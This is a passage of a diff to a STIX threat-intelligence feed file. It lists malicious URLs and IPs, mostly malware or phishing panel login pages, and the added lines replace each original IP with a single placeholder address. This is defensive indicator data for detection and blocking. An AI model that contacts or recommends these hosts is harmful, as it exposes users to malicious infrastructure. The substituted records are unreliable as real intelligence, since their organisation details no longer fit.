55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime","id":"indicator--8c3385b7-6ee5-4699-87c8-7a7b1da9b6aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-02-12T02:03:19.477Z","name":"mal_url: http://188.227.85.53/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://188.227.85.53/panel/admin.php']","type":"indicator","valid_from":"2020-02-12T02:03:19.477Z"}
-{"created":"2020-02-13T02:02:41.467Z","description":"TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--91ef9dde-3f0a-472c-b8ec-a1b9951acb50","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-13T02:02:41.467Z","name":"mal_ip: 111.90.142.42","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '111.90.142.42']","type":"indicator","valid_from":"2020-02-13T02:02:41.467Z"}
+{"created":"2020-02-12T02:03:19.477Z","description":"TS ID: 55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime","id":"indicator--8c3385b7-6ee5-4699-87c8-7a7b1da9b6aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-02-12T02:03:19.477Z","name":"mal_url: http://89.160.20.156/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/panel/admin.php']","type":"indicator","valid_from":"2020-02-12T02:03:19.477Z"}
+{"created":"2020-02-13T02:02:41.467Z","description":"TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: 
CyberCrime","id":"indicator--91ef9dde-3f0a-472c-b8ec-a1b9951acb50","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-13T02:02:41.467Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-13T02:02:41.467Z"}
 {"created":"2020-02-13T02:02:52.653Z","description":"TS ID: 55311776233; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--948a3e06-3481-4873-94e7-8ab068284aba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-13T02:02:52.653Z","name":"mal_url: http://felicombo.club/Zebra/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://felicombo.club/Zebra/admin.php']","type":"indicator","valid_from":"2020-02-13T02:02:52.653Z"}
 {"created":"2020-02-13T02:03:16.624Z","description":"TS ID: 55311776246; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--3b3faeec-4f78-41f2-acd8-13090336f058","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-13T02:03:16.624Z","name":"mal_url: http://pdocxoffice.com/Panel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pdocxoffice.com/Panel/login.php']","type":"indicator","valid_from":"2020-02-13T02:03:16.624Z"}
 {"created":"2020-02-13T02:03:36.577Z","description":"TS ID: 55311776248; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--ae6ff4c4-73c1-473a-90cb-99f135240243","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-13T02:03:36.577Z","name":"mal_url: 
http://megaeditores.com/fgv/PHP/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://megaeditores.com/fgv/PHP/index.php']","type":"indicator","valid_from":"2020-02-13T02:03:36.577Z"}
-{"created":"2020-02-13T02:03:38.86Z","description":"TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--104abde1-c4e9-45a2-85e1-525ea3bec752","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-23"],"modified":"2020-02-13T02:03:38.86Z","name":"mal_url: http://45.153.185.12/prUjRYcU2rqFpZqv/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.153.185.12/prUjRYcU2rqFpZqv/login.php']","type":"indicator","valid_from":"2020-02-13T02:03:38.86Z"}
+{"created":"2020-02-13T02:03:38.86Z","description":"TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--104abde1-c4e9-45a2-85e1-525ea3bec752","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-23"],"modified":"2020-02-13T02:03:38.86Z","name":"mal_url: http://89.160.20.156/prUjRYcU2rqFpZqv/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/prUjRYcU2rqFpZqv/login.php']","type":"indicator","valid_from":"2020-02-13T02:03:38.86Z"}
 {"created":"2020-02-20T04:06:53.787Z","description":"TS ID: 55316616622; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--57d0bd25-4211-4e2e-8a4e-31e38eeda90b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T04:06:53.787Z","name":"mal_url: http://hotlips.top/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://hotlips.top/login']","type":"indicator","valid_from":"2020-02-20T04:06:53.787Z"}
 {"created":"2020-02-20T04:08:45.548Z","description":"TS ID: 55316617564; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--d11be9c2-b408-42a4-a4ad-0ede3c1709f0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-20T04:08:45.548Z","name":"mal_url: http://aflamdirectory.com/wp-content/ip/login/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aflamdirectory.com/wp-content/ip/login/']","type":"indicator","valid_from":"2020-02-20T04:08:45.548Z"}
 {"created":"2020-02-20T04:08:45.601Z","description":"TS ID: 55316617187; iType: mal_url; State: active; Org: Telenet Ltd.; Source: CyberCrime","id":"indicator--ed5ed1a3-8090-4db3-92cb-3b7b733fa28e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T04:08:45.601Z","name":"mal_url: http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T04:08:45.601Z"}
-{"created":"2020-02-20T04:09:16.891Z","description":"TS ID: 55316616322; iType: mal_ip; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--6c201663-b1e4-483e-821b-0fe74aecc497","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:09:16.891Z","name":"mal_ip: 5.188.9.33","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '5.188.9.33']","type":"indicator","valid_from":"2020-02-20T04:09:16.891Z"}
+{"created":"2020-02-20T04:09:16.891Z","description":"TS ID: 55316616322; iType: mal_ip; State: 
active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--6c201663-b1e4-483e-821b-0fe74aecc497","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:09:16.891Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T04:09:16.891Z"}
 {"created":"2020-02-20T04:11:00.455Z","description":"TS ID: 55316616996; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--8203935f-fb3f-418c-945d-40fca5ef088d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T04:11:00.455Z","name":"mal_url: http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T04:11:00.455Z"}
-{"created":"2020-02-20T04:28:36.154Z","description":"TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--238f73e8-938d-4d08-9705-b1b669c129b2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-20T04:28:36.154Z","name":"mal_url: http://5.8.88.27/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.8.88.27/login']","type":"indicator","valid_from":"2020-02-20T04:28:36.154Z"}
+{"created":"2020-02-20T04:28:36.154Z","description":"TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--238f73e8-938d-4d08-9705-b1b669c129b2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-20T04:28:36.154Z","name":"mal_url: 
http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-20T04:28:36.154Z"}
 {"created":"2020-02-20T04:28:36.172Z","description":"TS ID: 55321824399; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--6ff21635-ac08-4afe-b5e7-c18dfe320f0f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:28:36.172Z","name":"mal_url: http://23.247.102.18/4/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/4/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:28:36.172Z"}
 {"created":"2020-02-20T04:28:36.19Z","description":"TS ID: 55321824397; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--9f55ff73-b6b6-476d-bb32-b9a7f8b16e93","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:28:36.19Z","name":"mal_url: http://23.247.102.18/6/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/6/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:28:36.19Z"}
 {"created":"2020-02-20T04:30:25.248Z","description":"TS ID: 55321824409; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--4abbf2ea-6e46-48e8-b74d-1928c92e6277","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-20T04:30:25.248Z","name":"mal_url: http://f0400035.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://f0400035.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T04:30:25.248Z"}
-{"created":"2020-02-20T04:31:26.488Z","description":"TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--8678d0a4-2b3c-4cea-a745-796f996e18bc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-20T04:31:26.488Z","name":"mal_ip: 217.8.117.22","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.22']","type":"indicator","valid_from":"2020-02-20T04:31:26.488Z"}
+{"created":"2020-02-20T04:31:26.488Z","description":"TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--8678d0a4-2b3c-4cea-a745-796f996e18bc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-20T04:31:26.488Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T04:31:26.488Z"}
 {"created":"2020-02-20T04:31:26.532Z","description":"TS ID: 55321824403; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--bfd713ad-3d94-441a-b6bc-135ce911b580","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:31:26.532Z","name":"mal_url: http://23.247.102.18/panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/panel/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:31:26.532Z"}
 {"created":"2020-02-20T04:31:26.582Z","description":"TS ID: 55321824401; iType: mal_url; State: active; Org: Global Frag Networks; Source: 
CyberCrime","id":"indicator--f43a4d56-b27f-41f0-917b-52358df31e13","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:31:26.582Z","name":"mal_url: http://23.247.102.18/2/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/2/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:31:26.582Z"}
-{"created":"2020-02-20T04:32:16.603Z","description":"TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--36d62b8e-77db-4111-be17-d0a3e20bbd9d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-41"],"modified":"2020-02-20T04:32:16.603Z","name":"mal_ip: 5.8.88.35","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '5.8.88.35']","type":"indicator","valid_from":"2020-02-20T04:32:16.603Z"}
-{"created":"2020-02-20T04:32:52.041Z","description":"TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--b6863ec6-1752-43b3-b748-ee8a29b6a52e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T04:32:52.041Z","name":"mal_ip: 2.57.91.231","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '2.57.91.231']","type":"indicator","valid_from":"2020-02-20T04:32:52.041Z"}
+{"created":"2020-02-20T04:32:16.603Z","description":"TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--36d62b8e-77db-4111-be17-d0a3e20bbd9d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-41"],"modified":"2020-02-20T04:32:16.603Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value 
= '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T04:32:16.603Z"}
+{"created":"2020-02-20T04:32:52.041Z","description":"TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--b6863ec6-1752-43b3-b748-ee8a29b6a52e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T04:32:52.041Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T04:32:52.041Z"}
 {"created":"2020-02-20T04:32:52.057Z","description":"TS ID: 55321824423; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--fb1aa473-4d9d-46a3-b053-ae7c051d0e14","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T04:32:52.057Z","name":"mal_url: http://lae9ac50.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lae9ac50.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-20T04:32:52.057Z"}
 {"created":"2020-02-20T04:32:52.074Z","description":"TS ID: 55321824417; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--f4447d70-3217-4319-9b89-4439db608f67","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-20T04:32:52.074Z","name":"mal_url: http://ld01c555.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ld01c555.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-20T04:32:52.074Z"}
 {"created":"2020-02-20T04:49:13.452Z","description":"TS ID: 55324942456; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: 
CyberCrime","id":"indicator--93e03851-428e-4e25-9fa6-17383426a6d7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T04:49:13.452Z","name":"mal_url: http://borrdrillling.com/psm91/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://borrdrillling.com/psm91/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:49:13.452Z"}
 {"created":"2020-02-20T04:49:22.233Z","description":"TS ID: 55324942451; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--ddce3ac3-2e92-4c94-9537-acefcbfecfc0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:49:22.233Z","name":"mal_url: http://wtfshop.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wtfshop.myjino.ru/login']","type":"indicator","valid_from":"2020-02-20T04:49:22.233Z"}
 {"created":"2020-02-20T04:50:21.678Z","description":"TS ID: 55324942453; iType: mal_url; State: active; Org: Avguro Technologies Ltd. 
Hosting service provider; Source: CyberCrime","id":"indicator--d4e1621e-ff57-4881-bf03-67f89c1db651","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:50:21.678Z","name":"mal_url: http://minecrafttusa1.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://minecrafttusa1.myjino.ru/login']","type":"indicator","valid_from":"2020-02-20T04:50:21.678Z"}
-{"created":"2020-02-20T04:50:21.708Z","description":"TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--99db47e4-6284-47db-a3bb-70dfcac899c2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-20"],"modified":"2020-02-20T04:50:21.708Z","name":"mal_ip: 141.8.194.74","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '141.8.194.74']","type":"indicator","valid_from":"2020-02-20T04:50:21.708Z"}
-{"created":"2020-02-20T04:50:33.473Z","description":"TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--75f014d9-2c40-4fa1-a05e-43521af4a944","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-36"],"modified":"2020-02-20T04:50:33.473Z","name":"mal_ip: 47.252.11.134","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '47.252.11.134']","type":"indicator","valid_from":"2020-02-20T04:50:33.473Z"}
+{"created":"2020-02-20T04:50:21.708Z","description":"TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: 
CyberCrime","id":"indicator--99db47e4-6284-47db-a3bb-70dfcac899c2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-20"],"modified":"2020-02-20T04:50:21.708Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T04:50:21.708Z"}
+{"created":"2020-02-20T04:50:33.473Z","description":"TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--75f014d9-2c40-4fa1-a05e-43521af4a944","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-36"],"modified":"2020-02-20T04:50:33.473Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T04:50:33.473Z"}
 {"created":"2020-02-20T04:51:08.292Z","description":"TS ID: 55324942438; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e5ae9133-c459-4130-b2cc-6bfc3d1bba08","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-20T04:51:08.292Z","name":"mal_url: http://amazon-fr.fun/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://amazon-fr.fun/admin/']","type":"indicator","valid_from":"2020-02-20T04:51:08.292Z"}
-{"created":"2020-02-20T05:16:07.933Z","description":"TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--19914258-5bed-4f35-8f57-f639b0d9c1a0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T05:16:07.933Z","name":"mal_url: http://5.8.88.68/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://5.8.88.68/login']","type":"indicator","valid_from":"2020-02-20T05:16:07.933Z"}
+{"created":"2020-02-20T05:16:07.933Z","description":"TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--19914258-5bed-4f35-8f57-f639b0d9c1a0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T05:16:07.933Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-20T05:16:07.933Z"}
 {"created":"2020-02-20T05:16:27.52Z","description":"TS ID: 55330801573; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--a1d0cc69-641e-4588-92f4-0ad9713860e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-20T05:16:27.52Z","name":"mal_url: http://f0400017.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0400017.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:16:27.52Z"}
 {"created":"2020-02-20T05:16:27.557Z","description":"TS ID: 55330801572; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--52371067-94be-4a79-b45d-8de115e81e86","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-20T05:16:27.557Z","name":"mal_url: http://f0391202.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391202.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:16:27.557Z"}
 {"created":"2020-02-20T05:16:37.354Z","description":"TS ID: 55328307469; iType: mal_url; State: active; Org: 
MoreneHost; Source: CyberCrime","id":"indicator--0e0682f9-a160-46c2-ba7f-ba9dc2858f7e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:16:37.354Z","name":"mal_url: http://ld7fa9c9.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ld7fa9c9.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-20T05:16:37.354Z"}
-{"created":"2020-02-20T05:16:41.613Z","description":"TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--c7e63dd5-c41f-4fd4-bbaa-8b54a1a1a227","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-20T05:16:41.613Z","name":"mal_ip: 161.117.178.167","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '161.117.178.167']","type":"indicator","valid_from":"2020-02-20T05:16:41.613Z"}
+{"created":"2020-02-20T05:16:41.613Z","description":"TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--c7e63dd5-c41f-4fd4-bbaa-8b54a1a1a227","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-20T05:16:41.613Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T05:16:41.613Z"}
 {"created":"2020-02-20T05:16:57.739Z","description":"TS ID: 55328307494; iType: mal_url; State: active; Org: Alicloud-us; Source: 
CyberCrime","id":"indicator--9f847df6-9c88-4a03-b852-394fd8a77f58","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T05:16:57.739Z","name":"mal_url: http://referral-casino.club/1/stats/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://referral-casino.club/1/stats/admin.php']","type":"indicator","valid_from":"2020-02-20T05:16:57.739Z"}
 {"created":"2020-02-20T05:16:57.764Z","description":"TS ID: 55328307481; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--479ea508-2ae1-4aea-825b-e83914fb8d53","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:16:57.764Z","name":"mal_url: http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:16:57.764Z"}
 {"created":"2020-02-20T05:16:57.791Z","description":"TS ID: 55328307476; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--051488db-6441-4ca9-9e5f-c8656e3b1d9f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-20T05:16:57.791Z","name":"mal_url: http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:16:57.791Z"}
-{"created":"2020-02-20T05:17:10.129Z","description":"TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: 
CyberCrime","id":"indicator--d5a928aa-3237-4c44-93e8-f73eb20dc728","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-20T05:17:10.129Z","name":"mal_ip: 185.98.87.59","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.98.87.59']","type":"indicator","valid_from":"2020-02-20T05:17:10.129Z"}
+{"created":"2020-02-20T05:17:10.129Z","description":"TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--d5a928aa-3237-4c44-93e8-f73eb20dc728","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-20T05:17:10.129Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-20T05:17:10.129Z"}
